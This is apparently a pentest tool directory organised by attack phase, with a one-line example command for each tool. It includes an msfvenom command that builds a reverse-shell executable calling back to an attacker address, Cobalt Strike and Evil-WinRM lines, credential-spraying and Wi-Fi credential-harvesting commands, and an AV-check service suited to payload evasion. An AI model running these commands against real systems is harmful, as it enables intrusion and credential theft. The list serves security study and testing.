Tactical Pentest Framework

16-Phase Tool Directory

๐Ÿ”RECON

Shodan

Search engine for internet-connected devices. Search for routers, servers, IoT devices, and public endpoints.

shodan search 'port:22 Country:US OS:Linux'
๐Ÿ”RECON

Censys

Search engine for global network scans. Enables researchers to find hosts and certificates exposed on the public internet.

censys search 'services.port: 80 AND location.country: "United States"'
๐Ÿ”RECON

crt.sh

Certificate Transparency log search tool. Discover subdomains and history of HTTPS certificates for any target domain.

curl -s 'https://crt.sh/?q=example.com&output=json' | jq .
๐Ÿ”RECON

DNSDumpster

DNS recon and research utility to find subdomains, host records, mail servers, and generate visual network maps.

python dnsdumpster.py target.com
๐Ÿ”RECON

The Harvester

Gather emails, subdomains, hosts, employee names, open ports, and banners from different public sources.

theHarvester -d target.com -l 500 -b google
๐Ÿ”RECON

Amass

In-depth subdomain enumeration, DNS mapping, and infrastructure profiling using active and passive OSINT.

amass enum -passive -d target.com
๐Ÿ“กSCANNING

Masscan

Fastest Internet port scanner. Transmits packets at speeds up to 10 million packets per second.

masscan -p1-65535 10.0.0.0/8 --rate 100000
๐Ÿ“กSCANNING

RustScan

Modern, lightning-fast port scanner written in Rust, designed to feed results directly into Nmap automatically.

rustscan -a target.com -- -sV -sC
๐Ÿ“กSCANNING

Dirsearch

Advanced web path scanner using command-line brute force, supporting multi-threading and proxy configurations.

dirsearch -u https://target.com/ -e php,html,js
๐Ÿ“กSCANNING

Gobuster

Directory/file, DNS, and VHost brute-forcing tool written in Go for rapid structure discovery.

gobuster dir -u https://target.com -w common-words.txt
๐Ÿ“กSCANNING

FFuf

Fast web fuzzer written in Go. Ideal for directory discovery, parameter fuzzing, and headers injection testing.

ffuf -w wordlist.txt -u https://target.com/FUZZ
โš ๏ธVULNERABILITY

OpenVAS

Open-source vulnerability scanner and manager. Offers a rich feed of vulnerability tests updated daily.

gvm-start && xdg-open https://localhost:9392
โš ๏ธVULNERABILITY

Searchsploit

Command-line search utility for Exploit Database, allowing offline searches for known server vulnerabilities.

searchsploit 'Apache 2.4.41'
๐Ÿ’ปWEB

OWASP ZAP

Free, open-source web application scanner. Perfect for developers and automated CI/CD pipeline integration.

zaproxy -cmd -quickurl https://target.com
๐Ÿ’ปWEB

Commix

Automated command injection exploitation framework. Detects and exploits OS command injection bugs in web forms.

commix --url='http://target.com/cmd.php?addr=INJECT_HERE'
๐Ÿ’ปWEB

XSStrike

Advanced Cross-Site Scripting (XSS) scanner with payload generator, intelligent fuzzer, and DOM parser.

python xsstrike.py -u 'https://target.com/search?q=query'
๐ŸงฎPASSWORD

John the Ripper

Fast password cracker designed for Unix, Windows, and macOS. Auto-detects encryption hash types.

john --wordlist=passwords.txt hashes.txt
๐ŸงฎPASSWORD

CrackStation

Instant lookups against multi-billion pre-computed lookup tables for cryptographic hashes.

Paste hash directly into CrackStation Web GUI for instant lookup
๐ŸงฎPASSWORD

CeWL

Custom Wordlist Generator. Scrapes websites to compile custom dictionary files based on target terminology.

cewl -d 2 -m 5 -w wordlist.txt https://target.com
๐Ÿ“ถWIRELESS

Airgeddon

Multi-use wireless audit script. Automates captive portal generation, handshakes, and deauth loops.

sudo ./airgeddon.sh
๐Ÿ“ถWIRELESS

Wifite

Automated mass Wi-Fi auditor. Target all nearby WPA/WPA2 networks, capture handshakes, and attack WPS PINs.

sudo wifite --dict wordlist.txt
๐Ÿ“ถWIRELESS

Bettercap

Complete, modular, and extensible framework for network monitoring, BLE spoofing, Wi-Fi sniffing, and MITM attacks.

sudo bettercap -eval "net.probe on; net.show"
๐ŸŒNETWORK

BloodHound

Active Directory relations visualizer. Maps pathways, access rights, and relationships to locate domain admin vectors.

sharpound.exe --CollectionMethod All --domain domain.local
๐ŸŒNETWORK

CrackMapExec

Swiss army knife for pentesting Active Directory. Automates mass credential testing and payload delivery over SMB/WinRM.

cme smb 10.10.10.0/24 -u user -p pass --local-auth
๐ŸŒNETWORK

Evil-WinRM

Ultimate Windows Remote Management (WinRM) shell for hacking. Features memory script loads, bypasses, and file transfers.

evil-winrm -i 10.10.10.5 -u Administrator -p 'Password123'
๐Ÿ’ฅEXPLOITATION

BeEF

Browser Exploitation Framework. Controls target web browsers to demonstrate client-side scripting attack vectors.

sudo ./beef
๐Ÿ’ฅEXPLOITATION

Social-Engineer Toolkit (SET)

Framework tailored for social engineering vectors. Clone target pages, host QR codes, and create weaponized PDF payloads.

sudo setoolkit
๐Ÿ’ฅEXPLOITATION

MSFvenom

Metasploit standalone payload generator. Encodes, bypasses detection, and outputs payloads for multiple architectures.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.2 LPORT=4444 -f exe > shell.exe
โšกPOST

Cobalt Strike

Commercial adversary simulation and red teaming platform. Generates advanced payloads and stable beaconing.

sudo ./teamserver 10.10.10.2 SuperSecretPass
โšกPOST

Ligolo-ng

Next-gen network tunneling and pivoting tool. Establishes clean, high-performance interfaces on the attacker machine.

./agent -connect 10.10.10.2:11601 -ignore-cert
๐Ÿ‘ฅSOCIAL

Wifiphisher

Red team tool that mounts automated Wi-Fi social engineering attacks against WPA networks to harvest credentials.

sudo wifiphisher -aC evil-ap.html
โœ‰๏ธEMAIL

TempMail

Instant disposable secure email provider. Ideal for registering on untrusted platforms during target research.

Open temp-mail.org for immediate API mail generation
โœ‰๏ธEMAIL

GuerrillaMail

Temporary email system. Send and receive emails with custom addresses. Bypasses spam checks.

Access at guerrillamail.com
โœ‰๏ธEMAIL

10MinuteMail

Highly private disposable email address that self-destructs after exactly 10 minutes.

Access at 10minutemail.com
๐Ÿ›ก๏ธANTIVIRUS

VirusTotal

Aggregate file and URL scanner. Checks uploads against 70+ antivirus engines and domain blocklists.

vt-cli scan file.exe
๐Ÿ›ก๏ธANTIVIRUS

Antiscan.me

Private file scanner that checks target files against major AVs without sharing or submitting logs to vendors.

Upload artifact through Antiscan Web Portal
๐Ÿค–AI

Garak

Large Language Model vulnerability scanner. Analyzes models for prompt injection, hallucinations, and data leaks.

python3 -m garak --model_type openai --model_name gpt-4
๐Ÿค–AI

Promptfoo

Test application outputs, prompt safety, and model security constraints via rigorous CI assertion models.

promptfoo eval -p prompts.txt -r providers.txt
๐ŸงชLABS

VirtualBox

Free and open-source x86/AMD64 hypervisor. Crucial for running target networks and isolated attack suites.

VBoxManage startvm 'Kali-Linux-Lab'
๐ŸงชLABS

Docker

Lightweight application containment engine, perfect for spinning up target web servers or vulnerable databases.

docker run -d -p 80:80 vulnerable-web-app
๐ŸŽ“EDUCATION

PortSwigger Academy

Free online security training for web applications. Tracks modern exploit techniques on real server structures.

Access Web Academy at portswigger.net
๐ŸŽ“EDUCATION

OffSec OSCP Program

Offensive Security Certified Professional program. The industry standard for network and exploit testing.

Access courseware at offsec.com
โ˜๏ธCLOUD

Vercel

Frontend developer platform. Instantly hosts lightweight static projects and serverless endpoints.

vercel deploy --prod
โ˜๏ธCLOUD

Cloudflare

Global CDN, secure reverse proxy, and enterprise DDoS shield. Protects target networks and filters scanning bots.

Configure rules via Cloudflare Dashboard